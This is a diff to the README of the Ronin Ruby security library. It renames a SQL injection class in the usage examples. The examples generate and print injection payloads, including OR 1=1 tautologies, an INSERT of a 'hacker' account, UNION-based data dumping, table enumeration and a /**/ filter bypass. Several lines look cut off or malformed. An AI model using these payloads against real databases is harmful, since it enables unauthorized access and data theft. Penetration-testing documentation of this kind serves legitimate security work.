@@ -61,7 +61,7 @@ string.sql_decode
6161Injecting a ` 1=1 ` test into a Integer comparison:
6262
6363``` ruby
64- sqli = Ronin ::Code ::SQL :: Injection .new
64+ sqli = Ronin ::Code ::SQLI .new
6565sqli.or { 1 == 1 }
6666puts sqli
6767# 1 OR 1=1
@@ -70,7 +70,7 @@ puts sqli
7070Injecting a ` 1=1 ` test into a String comparison:
7171
7272``` ruby
73- sqli = Ronin ::Code ::SQL :: Injection .new (escape: :string )
73+ sqli = Ronin ::Code ::SQLI .new (escape: :string )
7474sqli.or { string(1 ) == string(1 ) }
7575puts sqli
7676# 1' OR '1'='1
@@ -79,7 +79,7 @@ puts sqli
7979Columns:
8080
8181``` ruby
82- sqli = Ronin ::Code ::SQL :: Injection .new
82+ sqli = Ronin ::Code ::SQLI .new
8383sqli.and { admin == 1 }
8484puts sqli
8585# 1 AND admin=1
@@ -88,7 +88,7 @@ puts sqli
8888Clauses:
8989
9090``` ruby
91- sqli = Ronin ::Code ::SQL :: Injection .new
91+ sqli = Ronin ::Code ::SQLI .new
9292sqli.or { 1 == 1 }.limit(0 )
9393puts sqli
9494# 1 OR 1=1 LIMIT 0
@@ -97,7 +97,7 @@ puts sqli
9797Statements:
9898
9999``` ruby
100- sqli = Ronin ::Code ::SQL :: Injection .new
100+ sqli = Ronin ::Code ::SQLI .new
101101sqli.and { 1 == 0 }
102102sqli.insert.into(:users ).values(' hacker' ' passw0rd' ' t'
103103puts sqli
@@ -107,7 +107,7 @@ puts sqli
107107Sub-Statements:
108108
109109``` ruby
110- sqli = Ronin ::Code ::SQL :: Injection .new
110+ sqli = Ronin ::Code ::SQLI .new
111111sqli.union { select (1 ,2 ,3 ,4 ,id).from(users) }
112112puts sqli
113113# 1 UNION SELECT (1,2,3,4,id) FROM users
@@ -116,7 +116,7 @@ puts sqli
116116Test if a table exists:
117117
118118``` ruby
119- sqli = Ronin ::Code ::SQL :: Injection .new
119+ sqli = Ronin ::Code ::SQLI .new
120120sqli.and { select (count).from(:users ) == 1 }
121121puts sqli
122122# 1 AND (SELECT COUNT(*) FROM users)=1
@@ -125,7 +125,7 @@ puts sqli
125125Create errors by using non-existent tables:
126126
127127``` ruby
128- sqli = Ronin ::Code ::SQL :: Injection .new (escape: :string )
128+ sqli = Ronin ::Code ::SQLI .new (escape: :string )
129129sqli.and { non_existent_table == ' 1'
130130puts sqli
131131# 1' AND non_existent_table='1
@@ -134,7 +134,7 @@ puts sqli
134134Dumping all values of a column:
135135
136136``` ruby
137- sqli = Ronin ::Code ::SQL :: Injection .new (escape: :string )
137+ sqli = Ronin ::Code ::SQLI .new (escape: :string )
138138sqli.or { username.is_not(null) }.or { username == ' '
139139puts sqli
140140# 1' OR username IS NOT NULL OR username='
@@ -143,7 +143,7 @@ puts sqli
143143Enumerate through database table names:
144144
145145``` ruby
146- sqli = Ronin ::Code ::SQL :: Injection .new
146+ sqli = Ronin ::Code ::SQLI .new
147147sqli.and {
148148 ascii(
149149 lower(
@@ -160,7 +160,7 @@ puts sqli
160160Find user supplied tables via the ` sysObjects ` table:
161161
162162``` ruby
163- sqli = Ronin ::Code ::SQL :: Injection .new
163+ sqli = Ronin ::Code ::SQLI .new
164164sqli.union_all {
165165 select (1 ,2 ,3 ,4 ,5 ,6 ,name).from(sysObjects).where { xtype == ' U'
166166}
@@ -171,7 +171,7 @@ puts sqli.to_sql(terminate: true)
171171Bypass filters using ` /**/ ` instead of spaces:
172172
173173``` ruby
174- sqli = Ronin ::Code ::SQL :: Injection .new
174+ sqli = Ronin ::Code ::SQLI .new
175175sqli.union { select (1 ,2 ,3 ,4 ,id).from(users) }
176176puts sqli.to_sql(space: ' /**/'
177177# 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users
0 commit comments